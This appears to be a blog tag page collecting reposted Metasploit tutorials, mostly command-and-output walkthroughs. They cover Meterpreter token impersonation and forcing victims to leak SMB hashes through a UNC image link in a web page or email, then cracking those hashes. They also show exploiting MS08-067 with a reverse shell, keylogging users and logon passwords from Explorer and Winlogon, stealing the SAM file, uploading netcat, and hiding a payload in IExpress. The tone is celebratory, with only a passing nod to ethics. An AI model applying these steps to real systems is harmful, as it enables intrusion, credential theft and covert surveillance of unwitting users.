All Entries Tagged With: "metasploit"
Social Engineer Toolkit – Website Attack How To
I found this while wandering about the web. Be careful – it works!
Social Engineering Toolkit – Website Attack How To
As with all things “hack” – be careful how you proceed. The opportunity to hack is always there – the ability to show constraint and remain ethical is a necessity! ‘Nuff said.
Enjoy.
Metasploit 3.3 for iPhone
Download the stripped down metasploit 3.3 snapshot that should be iPhone/iTouch friendly – from HDMoore
Metasploit 3.3 for iPhone (107)
Make sure you visit http://www.metasploit.com for more information and details about the full blown Metasploit tool.
Metasploit on the iPod Touch – hacking an xp sp2 host
This is awesome – how to pwn an XP SP2 box from a iPod Touch! I love this stuff!
More on working with Incognito and Metasploit
From Carnal0wnage http://carnal0wnage.blogspot.com
Since a buddy asked for some clarification on using incognito extension with Metasploit/Meterpreter I’ll post some more notes on it.
the background you need is here:
http://www.mwrinfosecurity.com/publications/
mwri_security-implications-of-windows-access-tokens_2008-04-14.pdf
Let’s set up the scenario.
We either exploited something…yea! or we guessed an admin password and used the psexec module (that’s what I did). the psexec module will drop us to a SYSTEM shell if all went well.
msf exploit(psexec) > sessions
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.1.102:52595 -> 192.168.1.103:31851
msf exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: ORACLE-ENT
OS : Windows .NET Server (Build 3790, Service Pack 2).
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter > use incognito
Loading extension incognito...success.
now we want to query what tokens are available
Incognito Commands
==================
Command Description
------- -----------
add_group_user Attempt to add a user to a global group with all tokens
add_localgroup_user Attempt to add a user to a local group with all tokens
add_user Attempt to add a user with all tokens
impersonate_token Impersonate specified token
list_tokens List tokens available under current user context
snarf_hashes Snarf challenge/response hashes for every token
meterpreter > list_tokens
Usage: list_tokens
Lists all accessible tokens and their privilege level
OPTIONS:
-g List tokens by unique groupname
-u List tokens by unique username
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITYLOCAL SERVICE
NT AUTHORITYNETWORK SERVICE
NT AUTHORITYSYSTEM
ORACLE-ENTAdministrator
Impersonation Tokens Available
========================================
NT AUTHORITYANONYMOUS LOGON
We want to become the ORACLE-ENTAdministrator user
meterpreter > impersonate_token
Usage: impersonate_token
Instructs the meterpreter thread to impersonate the specified token. All other actions
will then be made in the context of that token.
Hint: Double backslash DOMAIN\name (meterpreter quirk)
Hint: Enclose with quotation marks if name contains a space
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter > impersonate_token ORACLE-ENT\Administrator
[+] Delegation token available
[+] Successfully impersonated user ORACLE-ENTAdministrator
meterpreter > getuid
Server username: ORACLE-ENTAdministrator
Ok, should you need to get back to system, just do a rev2self
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter > impersonate_token ORACLE-ENT\Administrator
[+] Delegation token available
[+] Successfully impersonated user ORACLE-ENTAdministrator
meterpreter > getuid
Server username: ORACLE-ENTAdministrator
Now you’ll probably want to run commands as that user…I hope that was the point of all this…
After you load the incognito extension you’ll get an extra option with your execute options (-t)
meterpreter > execute
Usage: execute -f file [options]
Executes a command on the remote machine.
OPTIONS:
-H Create the process hidden from view.
-a The arguments to pass to the command.
-c Channelized I/O (required for interaction).
-d The 'dummy' executable to launch when using -m.
-f The executable command to run.
-h Help menu.
-i Interact with the process after creating it.
-m Execute from memory.
-t Execute process with currently impersonated thread token
We need to use the “-t” so we can use the impersonated thread token, otherwise you’ll get a shell as SYSTEM or whoever you were.
meterpreter > execute -f cmd.exe -H -c -i -t
Process 2936 created.
Channel 6 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:>whoami
whoami
oracle-entadministrator
C:>
Using the Metasploit SMB Sniffer Module
From the Carnal0wnage blog
There has been some talk about using the SMB Relay module in Metasploit and then trying to crack those hashes. I’ll spare the links to protect the uninformed.
The SMB Relay module is for doing just what it says, relaying the SMB session back to another host. It used to be the same host but now, post 08-068, you have to pick another system on the network. Doesn’t matter what system, just not the same system. (I’ll try to cover this in another blog post soon)
Additionally, the SMB Relay module provides a random challenge for each attempt and doesn’t log those challenges anywhere that you could go back and use. So that pretty much rules out using the hashes you see in the output for password cracking.
For background it looks like this which looks just like the one that will work :-(
[*] Received 192.168.0.103:2281 XPSP1VM\vmwareXP LMHASH:7c83b9be93e202a4be355b75e982144b59bb9f836ec26200 NTHASH:9fc0fba25cb2817441a0ca8c003a4b68da83ef9e72514b2e OS:Windows 2002 2600 Service Pack 1 LM:Windows 2002 5.1
So what are we to do? Use the SMB Sniffer module of course!
The SMB sniffer module allows you to capture LM/NTLM hashes that can be cracked later. It uses a known challenge key which allows you to crack the hash offline.
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > info
Name: Authentication Capture: SMB
Version: 5966
Provided by: hdm
Description:
This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. All responses sent by this service have the same hardcoded challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel or L0phtcrack. To exploit this, the target system must try to authenticate to this module. The easiest way to force a SMB authentication attempt is by embedding a UNC path(\\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate.
We need to force a victim to authenticate to metasploit. The easiest way is to embed a UNC link into a webpage or email.
Example: img src="\\networkIP\share\1.gif"
Once the victim’s browser tries to authenticate, the sniffer module will capture the hashes (which can be cracked later using rainbow tables). You’ll notice the difference between this module and SMB Relay which issues a random challenge making cracking impossible. So if you want to crack passwords, use the server/capture/smb auxiliary module, if you want to try to get a shell use the smb_relay exploit module.
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > run
[*] Auxiliary module running as background job
msf auxiliary(smb) >
[*] Server started.
[*] Captured 192.168.0.101:57794 XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1
[*] Captured 192.168.0.101:44641 XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1
[*] Captured 192.168.0.101:49777 XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1
We can now use HALFLM rainbow tables with the 112233455667788 challenge to crack the first half of the password.
**We only take the first 16 characters of the LM password
LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d
We can then use rainbow tables to crack the first half:
$ ./rcracki *.rti -h 76365e2d142b5612
halflmchall_alpha-numeric#1-7_0_2400x57648865_1122334455667788_distrrtgen[p][i]_0.rti:
reading...
264241152 bytes read, disk access time: 4.97 s
verifying the file...
searching for 1 hash...
plaintext of 76365e2d142b5612 is PASSWOR
cryptanalysis time: 5.24 s
statistics
-------------------------------------------------------
plaintext found: 1 of 1 (100.00%)
total disk access time: 4.97 s
total cryptanalysis time: 5.24 s
total chain walk step: 1783216
total false alarm: 591
total chain walk step due to false alarm: 703255
result
-------------------------------------------------------
76365e2d142b5612 PASSWOR hex:50415353574f52
You will have to guess or bruteforce the rest :-( but thankfully there is a tool in your metasploit tools directory to help you do just that!
$ ruby halflm_second.rb
Usage: halflm_second.rb
OPTIONS:
-h Display this help information
-n The encypted LM hash to crack
-p The decrypted LANMAN password for bytes 1-7
$ ruby halflm_second.rb -n 76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d -p PASSWOR
[*] Trying one character...
[*] Cracked: PASSWORD
Meterpreter script for recording through a targets microphone
From PaulDotCom
Here’s a script for recording through a targets microphone. This was posted by PaulDotCom on Twitter, but if you think this should not be posted here, let me know! I think in the world of hacking, ethical or not, you have to know what the meterpreter shell is – once you find that out you have to work out how to effectively use it – not intuitive but oh so much fun – so perhaps this will be used by those that know, you know?
Download DHCP & IP Information (146)Remote Keystroke Sniffing with Meterpreter
posted by HDM here
Earlier this afternoon, I committed some code to allow keystroke sniffing through Meterpreter sessions. This was implemented as set of new commands for the stdapi extension of Meterpreter. Dark Operator, author of many great Meterpreter scripts, already wrote a nice blog post describing how to use the new keystroke sniffer, but I wanted to cover some of the internals and limitations as well.
The keyscan_start command spawns a new thread inside of the process where Meterpreter was injected. This thread allocates a large 1Mb buffer to store captured keystrokes. Every 30 ms, this thread calls GetAsyncKeyState, which returns the up/down status of each of the 256 possible Virtual Key Codes. If a key state change is detected and the new state is down, the key, along with the Shift, Control, and Alt flags are stored into the buffer as 16-bit value. If the entire buffer is used, it skips back to the beginning and overwrites old entries. This poll/compare method is based on a keyboard status application written by Rick, who presented at the last San Antonio Hackers meeting (and presents at Austin Hackers frequently).
One limitation of the GetAsyncKeyState function is that it must have access to the active, input desktop in order to monitor the key states. This presents a problem when the target process is running as a service. In the case of the VNC injection payload, we jump through a series of hoops to get access to the input desktop. This sequence has now been implemented as the grabdesktop command, but this is still not sufficient in many cases. If the service does not have rights to interact with the desktop, no amount of API jumping allows the GetAsyncKeyState function to receive keystrokes from the user.
Fortunately, Meterpreter supports the migrate command, which allows us to move our running code into a process that does have interactive access to the desktop. In the example below, we will use ms08_067_netapi exploit to obtain a Meterpreter shell on a Windows XP SP2 system, then migrate the running payload into the Explorer.exe process owned by the active user. This allows us to then use the keyscan_start and keyscan_dump commands to log the user’s keystrokes.
$ msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.118
RHOST => 192.168.0.118
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.139
LHOST => 192.168.0.139
msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3
msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability…
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened
meterpreter > ps
Process list
============
PID Name Path
— —- —-
292 wscntfy.exe C:WINDOWSsystem32wscntfy.exe
316 Explorer.EXE C:WINDOWSExplorer.EXE
356 smss.exe SystemRootSystem32smss.exe
416 csrss.exe ??C:WINDOWSsystem32csrss.exe
440 winlogon.exe ??C:WINDOWSsystem32winlogon.exe
[ snip ]
meterpreter > migrate 316
[*] Migrating to 316…
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 316
meterpreter > grabdesktop
Trying to hijack the input desktop…
meterpreter > keyscan_start
Starting the keystroke sniffer…
meterpreter > keyscan_dump
Dumping captured keystrokes…
This is a test of the keystroke logger <Comma> I am typing this inside of notepad.
Capturing Logon Credentials with Meterpreter
posted by HDM here
In my previous post, I described the keystroke sniffing capabilities of the Meterpreter payload. One of the key restrictions of this feature is that it can only sniff while running inside of a process with interactive access to the desktop. In the case of the MS08-067 exploit, we had to migrate into Explorer.exe in order to capture the logged-on user’s keystrokes.
While testing the keystroke sniffer, it occurred to me to migrate into the Winlogon.exe process instead. This process should have interactive access to the desktop, however when I tried to sniff the active user’s keystrokes this way, it was not successful. Although Winlogon could not access the logged-on desktop using GetAsyncKeyState, it can capture the username and password of anyone logging into the target’s console. The example below demonstrates this process:
msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability…
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened
meterpreter > ps
Process list
============
PID Name Path
— —- —-
292 wscntfy.exe C:WINDOWSsystem32wscntfy.exe
316 Explorer.EXE C:WINDOWSExplorer.EXE
356 smss.exe SystemRootSystem32smss.exe
416 csrss.exe ??C:WINDOWSsystem32csrss.exe
440 winlogon.exe ??C:WINDOWSsystem32winlogon.exe
[ snip ]
meterpreter > migrate 440
[*] Migrating to 440…
[*] Migration completed successfully.
meterpreter > keyscan_start
Starting the keystroke sniffer…
[ wait for user login ]
meterpreter > keyscan_dump
Dumping captured keystrokes…
Administrator <Tab> s3cretp4ss <Return>
Key logger fun …
Here’s a little something from pastie.org, pointed out by hdmoore in Twitter (a mine of interesting information!). Capture the logged-in users keystrokes, without disk access, after exploiting MS08-067, through migrate http://pastie.org/423800
Deploying meterpreter as an exploit payload
There are various ways of deploying the meterpreter payload. This short article deals with deploying meterpreter as an exploit payload. This article is not about exploiting the machine! I assume here that you have already done that. Assuming I have gained a meterpreter shell on my exploited machine I want to upload netcat to the ‘windows’ directory, and download the ‘not so hidden’ SAM file backup in the windowsrepair directory.
[*] uploading : /home/tools/nc.exe -> c:windows
[*] uploaded : /home/tools/nc.exe -> c:windowsnc.exe
meterpreter >
meterpreter> download c:windowsrepairsam /tmp
[*] downloading: c:windowsrepairsam -> /tmp
[*] downloaded : c:windowsrepairsam -> /tmp/sam
Let’s take a look at the process list …
Process list
============
PID Name Path
— —- —-
404 smss.exe SystemRootSystem32smss.exe
476 csrss.exe ??C:WINDOWSsystem32csrss.exe
648 winlogon.exe ??C:WINDOWSsystem32winlogon.exe
. . .
There’s more – you might be looking for a particular process. For this example I just wanted to show the command, simple as it is.
Now I want a DOS prompt (cmd.exe) and want to interact with it.
Process 1055 created.
Channel 2 created.
meterpreter > interact 2
Interacting with channel 2…
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:Program Filesexit
exit
meterpreter >
… and there you have it.
Hiding meterpreter in IExpress
This is the second time I’ve seen this on the web – this time it’s on YouTube. It’s pertinent though, since I’ve packaged other executables in the calculator executable, this one is an eye opener. Take a look and let me know what you think.
Commands from video:
* (For python 2.4+) python -m SimpleHTTPServer
* (For python 2.3 -) python -c “from SimpleHTTPServer import test; test()”
* Start -> Run -> iexpress
* Run multi/hander from command line (not shown in video)
Links from video:
* http://www.metasploit.com/
* http://www.shell-fu.org/
* http://www.microsoft.com/technet/prodtechnol/ie/ieak/techinfo/deploy/60/en/iexpress.mspx?mfr=true
* http://www.virustotal.com/
* http://www.theacademypro.com/
* http://www.theacademyhome.com/
